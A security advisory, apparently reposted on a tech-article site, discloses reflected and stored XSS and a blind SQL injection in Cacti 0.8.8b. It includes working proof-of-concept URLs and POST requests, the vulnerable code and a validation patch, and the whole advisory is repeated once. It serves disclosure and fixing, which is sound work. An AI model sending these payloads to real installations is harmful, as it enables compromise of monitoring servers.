Multiple vulnerabilities in Cacti 0.8.8b and lower
2013-08-21 11:10
519 查看
The following are XSS and SQL Injection vulnerabilities I've found in the latest version of Cacti (0.8.8b), but are also in lower versions.
[ Reflected XSS ]
There is a reflected Cross Site Scripting vulnerability in the "step" parameter of the "/install/index.php" script.
http://<IP>/cacti/install/index.php?x=52&y=21&step="><script>alert(12345)</script> [^]
[ Stored XSS ]
The "/cacti/host.php" script is vulnerable to a stored Cross Site Scripting vulnerability in the "id" parameter.
Send the following POST request.
POST /cacti/host.php HTTP/1.1
Host: <IP>
Cookie: Cacti=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
id=<script>alert(12345)</script>&save_component_host=1&action=save
Now browse to http://<IP>/cacti/utilities.php?tail_lines=500&message_type=-1&go=Go&refresh=60&reverse=1&filter=12345&page=1&action=view_logfile [^]
and you'll see a popup with the text "12345".
[ Blind SQL Injection ]
The "/cacti/host.php" script is vulnerable to Blind SQL Injection in the "id" parameter. The proof of concept below will send a query to the backend MySQL which will calculate the MD5 hash for "1" 1000000 times and thus cause a delay before finishing the query.
POST /cacti/host.php HTTP/1.1
Host: <IP>
Cookie: Cacti=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
id=-1 AND BENCHMARK(1000000,MD5(1))&save_component_host=1&action=save
The SQLi vulnerability is in the host.php which doesn't sanitize the $id parameter when providing it to the api_device_save() function in lib/api_device.php
host.php:
152: $host_id = api_device_save($_POST["id"], $_POST["host_template_id"], $_POST["description"],
lib/api_device.php:
94: function api_device_save($id, $host_template_id, $description, $hostname, $snmp_community, $snmp_version,
[..SNIP..]
103: /* fetch some cache variables */
104: if (empty($id)) {
105: $_host_template_id = 0;
106: }else{
107: $_host_template_id = db_fetch_cell("select host_template_id from host where id=$id");
108: }
The changes below in "host.php" will fix this:
148: if ((isset($_POST["save_component_host"])) && (empty($_POST["add_dq_x"]))) {
149:+ /* ================= input validation ================= */
150:+ input_validate_input_number(get_request_var_post("id"));
151:+ /* ==================================================== */
152: if ($_POST["snmp_version"] == 3 && ($_POST["snmp_password"] != $_POST["snmp_password_confirm"])) {
[ Reflected XSS ]
There is a reflected Cross Site Scripting vulnerability in the "step" parameter of the "/install/index.php" script.
http://<IP>/cacti/install/index.php?x=52&y=21&step="><script>alert(12345)</script> [^]
[ Stored XSS ]
The "/cacti/host.php" script is vulnerable to a stored Cross Site Scripting vulnerability in the "id" parameter.
Send the following POST request.
POST /cacti/host.php HTTP/1.1
Host: <IP>
Cookie: Cacti=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
id=<script>alert(12345)</script>&save_component_host=1&action=save
Now browse to http://<IP>/cacti/utilities.php?tail_lines=500&message_type=-1&go=Go&refresh=60&reverse=1&filter=12345&page=1&action=view_logfile [^]
and you'll see a popup with the text "12345".
[ Blind SQL Injection ]
The "/cacti/host.php" script is vulnerable to Blind SQL Injection in the "id" parameter. The proof of concept below will send a query to the backend MySQL which will calculate the MD5 hash for "1" 1000000 times and thus cause a delay before finishing the query.
POST /cacti/host.php HTTP/1.1
Host: <IP>
Cookie: Cacti=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
id=-1 AND BENCHMARK(1000000,MD5(1))&save_component_host=1&action=save
The SQLi vulnerability is in the host.php which doesn't sanitize the $id parameter when providing it to the api_device_save() function in lib/api_device.php
host.php:
152: $host_id = api_device_save($_POST["id"], $_POST["host_template_id"], $_POST["description"],
lib/api_device.php:
94: function api_device_save($id, $host_template_id, $description, $hostname, $snmp_community, $snmp_version,
[..SNIP..]
103: /* fetch some cache variables */
104: if (empty($id)) {
105: $_host_template_id = 0;
106: }else{
107: $_host_template_id = db_fetch_cell("select host_template_id from host where id=$id");
108: }
The changes below in "host.php" will fix this:
148: if ((isset($_POST["save_component_host"])) && (empty($_POST["add_dq_x"]))) {
149:+ /* ================= input validation ================= */
150:+ input_validate_input_number(get_request_var_post("id"));
151:+ /* ==================================================== */
152: if ($_POST["snmp_version"] == 3 && ($_POST["snmp_password"] != $_POST["snmp_password_confirm"])) {
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
- Multiple OCRs and vote disks on ASM in Oracle 11gR2
- How To Create Multiple Folders And Sub-Folders In One Go
- [waraxe-2012-SA#084] - Multiple Vulnerabilities in OpenCart 1.5.2.1 漏洞
- Cacti Multiple Input Validation Security Vulnerabilities
- Method and apparatus for loading a segment register in a microprocessor capable of operating in multiple modes
- Scraping multiple sites in parallel and memory consumption - Google Groups
- Create an Entity Framework Model and Use it in Multiple Projects
- Summary of Critical and Exploitable iOS Vulnerabilities in 2016
- Powershell: Launch multiple script in parallel and check exit code for each.
- BF and IA vulnerabilities in IBM Lotus Domino
- Multiple vulnerabilities in XAMPP
- How to check invalid objects and broken job in multiple database
- [waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
- Summary of Critical and Exploitable iOS Vulnerabilities in 2016
- How to Exploit Multiple Monitor Support in Memphis and Windows NT 5.0
- How to get multiple select value both in javascript and php
- Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers
- Multiple strings.xml files cause order and incomplete problems in android
- Default Methods in Java 8 and Multiple Inheritance